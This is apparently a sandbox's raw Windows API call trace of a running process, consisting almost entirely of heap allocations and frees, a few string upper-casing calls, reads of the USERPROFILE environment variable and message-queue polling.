0x24b2658 [0242.680] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0242.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0242.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0242.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0242.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2658 [0242.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0242.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0242.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0242.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0242.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0242.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0242.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0242.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0242.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0242.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0242.681] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0242.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0242.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0242.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0242.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0242.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0242.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa838 [0242.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0242.681] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0242.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0242.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0242.681] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0242.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0242.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0242.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0242.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0242.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0242.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0242.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0242.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0242.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0242.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0242.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0242.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0242.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0242.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x24207f0 [0242.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0242.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0242.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0242.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0242.682] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0242.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0242.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0242.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0242.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0242.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0242.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0242.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0242.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0242.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0242.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0242.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0242.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0242.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0242.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0242.683] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0242.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0242.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0242.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7f0 [0242.683] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0242.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0242.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa838 [0242.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0242.684] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0242.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa78 [0242.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0242.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2db8 [0242.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0242.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0242.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0242.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0242.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0242.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0242.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0242.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0242.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0242.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0242.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0242.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0242.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0242.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x249c7b0 [0242.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0242.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0242.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0242.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0242.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0242.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0242.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0242.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0242.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0242.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0242.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0242.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0242.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2088 [0242.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0242.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0242.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0242.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0242.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0242.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0242.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0242.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0242.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0242.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0242.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0242.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0242.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0242.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0242.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0242.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0242.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0242.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0242.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0242.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0242.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0242.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0242.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0242.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0242.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0242.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0242.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0242.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0242.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0242.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0242.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0242.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0242.687] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0242.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0242.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0242.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0242.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0242.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0242.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0242.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0242.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0242.688] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0242.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0242.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0242.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0242.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0242.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0242.688] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0242.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0242.688] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0242.689] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0242.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0242.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0242.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0242.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0242.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0242.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0242.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0242.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0242.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0242.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0242.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0242.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0242.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0242.689] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0242.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0242.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0242.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0242.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0242.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0242.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0242.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0242.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0242.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0242.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0242.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0242.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0242.690] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0242.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0242.690] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0242.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0242.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0242.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0242.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0242.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0242.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0242.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0242.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0242.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0242.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0242.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0242.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0242.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0242.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0242.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0242.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0242.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0242.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0242.691] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0242.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0242.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0242.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0242.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0242.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0242.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0242.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0242.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0242.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0242.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0242.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0242.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0242.692] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0242.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0242.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0242.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0242.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0242.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0242.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0242.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0242.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0242.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0242.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0242.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0242.693] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0242.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0242.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0242.693] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0242.693] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0242.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0242.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0242.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0242.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0242.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0242.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0242.694] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0242.694] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 